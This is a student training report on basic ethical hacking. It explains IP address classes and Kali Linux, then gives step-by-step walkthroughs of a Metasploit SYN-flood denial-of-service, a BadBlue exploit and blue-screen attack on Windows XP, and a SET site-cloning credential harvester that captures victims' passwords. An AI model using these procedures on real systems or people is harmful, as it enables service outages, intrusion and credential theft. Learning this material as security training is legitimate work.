1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

NATIONAL INSTITUTE FOR INDUSTRIAL 

TRAINING 
 
 
 
NAME - BISHWAJIT PRASAD GOND 
 
COLLEGE - GOVERNMENT COLLEGE OF ENGINEERING 
AND LEATHER TECHNOLOGY 
 
PROJECT - BASIC ETHICAL HACKING (Winter Training). 
 
DATE - 10th January ,2019. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 1/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

 
INDEX 
 
Serial no  Topic  Remarks 
1  What is Hacking?   
2  Who is Hacker?   
3  Type of Hacker   
4  What is an IP Address?   
5  Classes of IP   
6  Kali Linux   
7  List of Project Topic   
 

  Denial-of-service attack   
(DOS Attack). 

  Blue screen test for windows   

(Window XP). 

  Site - Cloning   
(Social Engineering Tool) 

     
     
     
     
 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 2/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

What is Hacking ? 
 
The gaining of unauthorized access to data in a system or computer. 

Who is a Hacker?  

A Hacker is a person who finds and exploits the weakness in computer systems 
and/or networks to gain access. Hackers are usually skilled computer 
programmers with knowledge of computer security.Hackers are classified 
according to the intent of their actions. The following list classifies hackers 
according to their intent. 

Types of Hackers 
 
● Black Hat 
 
Black hat hackers are normally responsible for creating malware, which is 
frequently used to infiltrate computerized networks and systems. They’re 
usually motivated by personal or financial gain, but can also participate in 
espionage, protests, or merely enjoy the thrill. Black hat hackers can be anyone 
from amateurs to highly experienced and knowledgeable individuals looking to 
spread malware, steal private data, like login credentials, along with financial 
and personal information. Upon accessing their targets and depending on their 
motives, black hat hackers can either steal, manipulate, or destroy system data. 
 
● White Hat 
 
Also known as “ethical hackers,” they’re often employed or contracted by 
companies and governmental entities, working as security specialists looking 
for vulnerabilities. While they employ the same methods as black hat hackers, 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 3/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

they always have permission from the system’s owner, making their actions 
completely legal. White hat hackers implement strategies like penetration 
tests, monitor in-place security systems, along with vulnerability assessments. 
Ethical hacking, the term used to describe the nature of a white hat hackers’ 
actions, can even be learned through independent sources, training, 
conferences, and certifications. 
 
● Grey Hat 
As the name suggests, these individuals utilize aspects from black and white 
hat hackers, but will usually seek out vulnerabilities in a system without an 
owner’s permission or knowledge. While they’ll report any issues they 
encounter to the owner, they’ll also request some sort of compensation or 
incentive. Should the owner not respond or reject their proposition, a grey hat 
hacker might exploit the newfound flaws. Grey hat hackers aren’t malicious by 
nature, but do seek to have their efforts rewarded. Since grey hat hackers don’t 
have permission to access the system by its owner, their actions are ultimately 
considered illegal, despite any alarming findings they might reveal. 
 
 
What is an IP Address ? 
 
An IP address (internet protocol address) is a numerical representation that 
uniquely identifies a specific interface on the network. 

Addresses in IPv4 are 32-bits long. This allows for a maximum of 
4,294,967,296 (232) unique addresses. Addresses in IPv6 are 128-bits, which 
allows for 3.4 x 1038 (2128) unique addresses.  

The total usable address pool of both versions is reduced by various reserved 
addresses and other considerations. 

IP addresses are binary numbers but are typically expressed in decimal form 
(IPv4) or hexadecimal form (IPv6) to make reading and using them easier for 
humans. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 4/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

IP stands for Internet Protocol and describes a set of standards and 

requirements for creating and transmitting data packets, or datagrams, across 
networks. The Internet Protocol (IP) is part of the Internet layer of the Internet 
protocol suite. In the OSI model, IP would be considered part of the network 
layer. IP is traditionally used in conjunction with a higher-level protocol, most 
notably TCP. The IP standard is governed by RFC 791. 

Classes of IP? 
 
 
 

Class  First octet value  Subnet mask 

A  1-126  8 
B  128-191  16 
C  192-223  24 
D  224-239  - 
E  240-255  - 
 
 
 
 
 
 
 
 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 5/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

Class A  
In a Class A network, the first eight bits, or the first dotted decimal, is the 
network part of the address, with the remaining part of the address being the 
host part of the address. There are 128 possible Class A networks. 

0.0.0.0 to 127.0.0.0 
  

However, any address that begins with 127. is considered a loopback address. 

Example for a Class A IP address: 

2.134.213.2 
 

Class B 
In a Class B network, the first 16 bits are the network part of the address. All 
Class B networks have their first bit set to 1 and the second bit set to 0. In 
dotted decimal notation, that makes 128.0.0.0 to 191.255.0.0 as Class B 
networks. There are 16,384 possible Class B networks. 

Example for a Class B IP address: 

135.58.24.17 
 

Class C 
In a Class C network, the first two bits are set to 1, and the third bit is set to 0. 
That makes the first 24 bits of the address the network address and the 
remainder as the host address. Class C network addresses range from 
192.0.0.0 to 223.255.255.0. There are over 2 million possible Class C networks. 

Example for a Class C IP address: 

192.168.178.1 
  

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 6/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

Class D 
Class D addresses are used for multicasting applications. Unlike the previous 
classes, the Class D is not used for "normal" networking operations. Class D 
addresses have their first three bits set to “1” and their fourth bit set to “0”. 
Class D addresses are 32-bit network addresses, meaning that all the values 
within the range of 224.0.0.0 – 239.255.255.255 are used to uniquely identify 
multicast groups. There are no host addresses within the Class D address 
space, since all the hosts within a group share the group’s IP address for 
receiver purposes. 

Example for a Class D IP address: 

227.21.6.173 
 

Class E 
Class E networks are defined by having the first four network address bits as 1. 
That encompasses addresses from 240.0.0.0 to 255.255.255.255. While this 
class is reserved, its usage was never defined. As a result, most network 
implementations discard these addresses as illegal or undefined. The exception 
is 255.255.255.255, which is used as a broadcast address. 

Example for a Class D IP address: 

243.164.89.28 
  

Overview: IP address classes and bit-wise representations 

Class A 
0. 0. 0. 0 = 00000000.00000000.00000000.00000000 
127.255.255.255 = 01111111.11111111.11111111.11111111 
0nnnnnnn.HHHHHHHH.HHHHHHHH.HHHHHHHH 
 
Class B 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 7/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

128. 0. 0. 0 = 10000000.00000000.00000000.00000000 
191.255.255.255 = 10111111.11111111.11111111.11111111 
10nnnnnn.nnnnnnnn.HHHHHHHH.HHHHHHHH 
 
Class C 
192. 0. 0. 0 = 11000000.00000000.00000000.00000000 
223.255.255.255 = 11011111.11111111.11111111.11111111 
110nnnnn.nnnnnnnn.nnnnnnnn.HHHHHHHH 
 
Class D 
224. 0. 0. 0 = 11100000.00000000.00000000.00000000 
239.255.255.255 = 11101111.11111111.11111111.11111111 
1110XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 
 
Class E 
240. 0. 0. 0 = 11110000.00000000.00000000.00000000 
255.255.255.255 = 11111111.11111111.11111111.11111111 
1111XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 8/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

FOR THE BASIC ETHICAL HACKING WE USED 

KALI LINUX  

Kali Linux is a Debian-derived Linux distribution designed for digital forensics 

and penetration testing. It is maintained and funded by Offensive Security Ltd. 
 
LIST OF PROJECT TOPIC  
 
● Denial-of-service attack(DOS Attack). 
● Blue screen test for windows (Window XP). 
● Site - Cloning (Social Engineering Tool) 
 
  
Denial-of-service attack(DOS Attack)- 
 
In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which 
the perpetrator seeks to make a machine or network resource unavailable to its 
intended users by temporarily or indefinitely disrupting services of a host 
connected to the Internet. 
 
BY USING SYNFLOOD

1. Use ifconfig in terminal to know the IP of router . 

2. If we don’t know the IP address and port no. of the target, run a network 
nmap through “nmap -sS -sV 192.168.1.1–255” to get the list of devices 
configured on the network. Once we located our target IP, run nmap on it 
through “nmap xxx.xxx.xxx.xxx”. This should scan our target and reveal open 
ports that can be used for overloading. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 9/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

3. Type “msfconsole” in a terminal. This should start an instance of metasploit.

 
4. Search synflood in metasploit by “search synflood”. 
5. Once metasploit starts, type “use auxiliary/dos/tcp/synflood” to command 
metasploit to prepare a synflood attack interface. 
6. Now if we type “show options”, it should list the settings of the synflood 
interface. Here, the RHOST and RPORT represents the target’s IP address 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 10/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

and the target’s port respectively.

 
7. Now back in metasploit, once we have the IP address and port no. , type “set 
RHOST xxx.xxx.xxx.xxx” and “set RPORT yourtarget’sportno”. This should 
set the proper IP and port no. for the attack. 

8. Type “exploit” in metasploit and watch the attack unfold. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 11/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

Blue screen test for windows (Window XP). 

 

1. Open ifconfig in terminal to get the IP of router xxx.xxx.xxx.xxx 

2. Then do network mapping on the router IP by “nmap -sS -sV 
xxx.xxx.xxx.0-254”. 

3. Open new terminal for metasploit by hitting “msfconsole”in the terminal. 

4. “Search badblue” in msf 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 12/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

5. Then “use ------------------------”(use search result). 

6. Then “show options” , and “set rhost xxx.xxx.xxx.xxx”(victim ip address), then 

“exploit”. 
7. Then type “sysinfo” ,“run getgui -e” , then “background”, “search 
maxchannel”. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 13/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

8. Then “use _________________”(use search result). 

9. Then “show options” , and “set rhost xxx.xxx.xxx.xxx”(victim ip address), then 
“exploit”. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 14/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

 
Site - Cloning (Social Engineering Tool) 
1. At first open Social Engineering Tool(SET) from application menu of 
kali. 

 
2. Then select Social Engineering Attacks 
 

 
 
3. Then use Credential Harvester Attack Meathod. 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 15/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

 
4. Then use Site cloner. 
 
5. Paste the IP of the router from ifconfig . 
 
6. After that paste it on browser . 
 

 
7. Let the victim type its user id and password. 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 16/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

8. We will get the password and user id in the terminal. 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 17/18
1/10/2019 NATIONAL INSTITUTE FOR INDUSTRIAL TRAINING FINAL - Google Docs

CONCLUSION  
  
I have arrived at the conclusion of my journey into several penetration 

testing. This is a very exciting branch of penetration testing that is 

rapidly evolving and will certainly be increasingly important in the 

future.  

Learning and mastering Kali Linux for penetration testing not only 

provides us with a great set of tools to use but, as they are all open 

source, also gives us the opportunity to understand the logic of their 

implementation and of the attacks performed in depth. 

Special thanks to our instructor “Rahit Biswas” 

-----------------Thank You----------------- 

 
 

https://docs.google.com/document/d/1mxu-_QsD0HzTBEcujutGV3P5dKc1e2Lmz4TUqvqfA34/edit 18/18